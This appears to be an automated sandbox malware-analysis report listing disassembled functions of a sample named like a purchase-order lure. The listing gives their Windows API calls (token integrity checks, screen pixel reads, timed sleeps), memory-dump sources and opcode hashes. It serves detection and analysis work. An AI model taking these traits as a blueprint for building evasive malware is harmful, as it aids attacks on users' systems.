                                      • Instruction ID: 1fa4ccea6f2a25d5d7dfa3c8e583f4ebe8c1853e79d10574fa3302925bfb4baa
                                      • Opcode Fuzzy Hash: e3a6c55b3116f3a2fa7e1a778f947023c085c496dd435522f9018cadc521b1cb
                                      • Instruction Fuzzy Hash: 8F314A71600606EFDB24DFA5C884AAFBFF9FF16354B10452EF506D2181EB30AE459B61
                                      Function 004F1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 004F1915
                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 004F19C1
                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 004F19C9
                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 004F19DA
                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004F19E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: f0741defef97a69fac7cfddb9c773141bdc1afbeaa8363a3464ba82c2adfe6f9
                                      • Instruction ID: 5232c6aa5cdab17dd458a614ef41b861f962b3501ecb305ccbe37f14b90ddb1a
                                      • Opcode Fuzzy Hash: f0741defef97a69fac7cfddb9c773141bdc1afbeaa8363a3464ba82c2adfe6f9
                                      • Instruction Fuzzy Hash: 5A31C47190021DEFCB14CF68C999EEE3BB5EF05314F10421AFA21AB2E1C3B49954DB90
                                      Function 00525706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00525745
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0052579D
                                      • _wcslen.LIBCMT ref: 005257AF
                                      • _wcslen.LIBCMT ref: 005257BA
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00525816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen
                                      • String ID:
                                      • API String ID: 763830540-0
                                      • Opcode ID: 1afc3127da61ba865eb27f8878a531c5dcf39016e54298ee13323fe93861a009
                                      • Instruction ID: 7170e1eeaaa7a72c1696845052fe0892364e5795f311858a577f78c88869e6c8
                                      • Opcode Fuzzy Hash: 1afc3127da61ba865eb27f8878a531c5dcf39016e54298ee13323fe93861a009
                                      • Instruction Fuzzy Hash: AF21A771904628DADF209F64EC84AEDBFB8FF56324F148116E919DB1C1E7709985CF50
                                      Function 00510930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00510951
                                      • GetForegroundWindow.USER32 ref: 00510968
                                      • GetDC.USER32(00000000), ref: 005109A4
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 005109B0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 005109E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: b3a8e52d2eac7d724b3aee88db40b8ebb6fcbbe6985481fe1ffce8e21e043108
                                      • Instruction ID: 006a460f315efb368ce16ca2d0c826c49da7440d4846e6107a3b002b720932d6
                                      • Opcode Fuzzy Hash: b3a8e52d2eac7d724b3aee88db40b8ebb6fcbbe6985481fe1ffce8e21e043108
                                      • Instruction Fuzzy Hash: C621C235600204AFDB14EF69C988A9EBFE8FF45700F00806DE84A973A2CB70AC44DB90
                                      Function 004CCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 004CCDC6
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004CCDE9
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004CCE0F
                                      • _free.LIBCMT ref: 004CCE22
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004CCE31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: db86e7c52af9949ececf61f18f923877d4da4f6a82af409295ded3d9de212e97
                                      • Instruction ID: 28509dfe2c64e522526c1652e7f0a83b38cc726e4a07299e4b1a2de445aa301f
                                      • Opcode Fuzzy Hash: db86e7c52af9949ececf61f18f923877d4da4f6a82af409295ded3d9de212e97
                                      • Instruction Fuzzy Hash: 5701247A6016103F23611AB76CC8E7F6D6CDEC3BA1315012FF909C3302EA688D0291F8
                                      Function 004A9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                      • SelectObject.GDI32(?,00000000), ref: 004A96A2
                                      • BeginPath.GDI32(?), ref: 004A96B9
                                      • SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 32e2e1a28c8f6a569e2a22277fcc4b446f1c1024ea649fc4990861a412e4948d
                                      • Instruction ID: eb4412686d612156b89978e20128116dc2ee7ee66dca897ba016472d384d8bac
                                      • Opcode Fuzzy Hash: 32e2e1a28c8f6a569e2a22277fcc4b446f1c1024ea649fc4990861a412e4948d
                                      • Instruction Fuzzy Hash: 7A216030801605EBEB119F69DC197BE3BA4BF32315F180216F811971A1D3B85C9AEF9D
                                      Function 004F5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: a1b857c32954db7aee6f6b7db3aa9d124780f04c3ed810515151beee3018d873
                                      • Instruction ID: ea08e527ebaafb0c9ae4a82dff1e8478d508de390920f5786dc8612d6fc94375
                                      • Opcode Fuzzy Hash: a1b857c32954db7aee6f6b7db3aa9d124780f04c3ed810515151beee3018d873
                                      • Instruction Fuzzy Hash: A301DB71245A1DBBE2086111AD81EFB73DC9F21398F400036FF059A681F628ED1182B9
                                      Function 004C2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6), ref: 004C2DFD
                                      • _free.LIBCMT ref: 004C2E32
                                      • _free.LIBCMT ref: 004C2E59
                                      • SetLastError.KERNEL32(00000000,00491129), ref: 004C2E66
                                      • SetLastError.KERNEL32(00000000,00491129), ref: 004C2E6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 7d67fa339ec782e65f0dae7900fc46a0bbd005f079105c3cb49f857152f48f36
                                      • Instruction ID: be2a8f6e917440239c400c87e3a42ef010e42595a376b4f46b200674d603e762
                                      • Opcode Fuzzy Hash: 7d67fa339ec782e65f0dae7900fc46a0bbd005f079105c3cb49f857152f48f36
                                      • Instruction Fuzzy Hash: FD01F97E205A006BC69267766E45F2F196DAFE2379721442FF415B22D3EAFC8C069028
                                      Function 004F000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?,?,004F035E), ref: 004F002B
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0046
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0054
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?), ref: 004F0064
                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0070
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: bb14e96b0d6a2ea0bfe9fdd4abf9ba51bcd2b829cf816d0ecbfa6032fdab32e6
                                      • Instruction ID: 00639d3fc52bf690e7e8f3dc1f604b759088d408700c45602173741f37e9594f
                                      • Opcode Fuzzy Hash: bb14e96b0d6a2ea0bfe9fdd4abf9ba51bcd2b829cf816d0ecbfa6032fdab32e6
                                      • Instruction Fuzzy Hash: F1018F72600208BFDB204F68EC04FBE7EADEF94751F148125FA05D2212DB79DD459BA0
                                      Function 004FE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004FE997
                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 004FE9A5
                                      • Sleep.KERNEL32(00000000), ref: 004FE9AD
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004FE9B7
                                      • Sleep.KERNEL32 ref: 004FE9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 13213b3404a52ddc218f8d29f7c2ba85fd6e42fc2c9b6afe8caed2c8267387a9
                                      • Instruction ID: 3e7fadd3fb1351588e8f896e857f577d9a11348f8fc60b3bb95aa9de6129772a
                                      • Opcode Fuzzy Hash: 13213b3404a52ddc218f8d29f7c2ba85fd6e42fc2c9b6afe8caed2c8267387a9
                                      • Instruction Fuzzy Hash: C301A171C0052DDBCF109FE6DD49AEDBB78FF1A301F000106D601B2261CB74455AD765
                                      Function 004F10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 707669f62911c1748e3cfba89cec40bc91cb584d197380da70394cd2b4916a21
                                      • Instruction ID: ecec6509ce2f9e62f3a64e68667201e1ea2c9704c8e55a197f0cf48a63c71bc6
                                      • Opcode Fuzzy Hash: 707669f62911c1748e3cfba89cec40bc91cb584d197380da70394cd2b4916a21
                                      • Instruction Fuzzy Hash: A6016D79100205BFDB214F64DC49A6F3F6EEF8A360B100419FA41C3361DB31DC05DA60
                                      Function 004F0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F0FCA
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F0FD6
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F0FE5
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F0FEC
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F1002
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 1c524bf6c09cf6635cb7c3486c7c53e23a81667eb163294369cd1c74de3dce9c
                                      • Instruction ID: 7463f9908202b2a0b1ff31c6ed183eb6ec2e95dfd113cf6633e92d8f4c089390
                                      • Opcode Fuzzy Hash: 1c524bf6c09cf6635cb7c3486c7c53e23a81667eb163294369cd1c74de3dce9c
                                      • Instruction Fuzzy Hash: 20F0A936200305EFDB214FA59C4EF6B3FADEF9A762F200425FA05C7262CA30DC459A60
                                      Function 004F1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F102A
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F1036
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1045
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F104C
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1062
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: f97539613346c1707ea15a4aed7361cbc7de2aa17f44b5fd98ce9cbd323148d8
                                      • Instruction ID: acac271270a10cb24b4e7f2d6707fbbe64e853d286230a02580a77485731f508
                                      • Opcode Fuzzy Hash: f97539613346c1707ea15a4aed7361cbc7de2aa17f44b5fd98ce9cbd323148d8
                                      • Instruction Fuzzy Hash: 01F0A935200305EFDB215FA5EC49F6B3FADEF9A761F200425FA05D7261CA30D8459A60
                                      Function 0050030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500324
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500331
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 0050033E
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 0050034B
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500358
                                      • CloseHandle.KERNEL32(?,?,?,?,0050017D,?,005032FC,?,00000001,004D2592,?), ref: 00500365
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: f6d2208449da2423e6e50a6f7a343ac9375839005640a8ee87be0e1c14eac9d9
                                      • Instruction ID: 9f6b87743b1bfe120649798263a3864acd9af3445b1ac17627d95b1cca73c4f4
                                      • Opcode Fuzzy Hash: f6d2208449da2423e6e50a6f7a343ac9375839005640a8ee87be0e1c14eac9d9
                                      • Instruction Fuzzy Hash: F601EE72800B019FCB31AF66D88094AFBF9BF603163149E3FD192529B1C3B0A948CF80
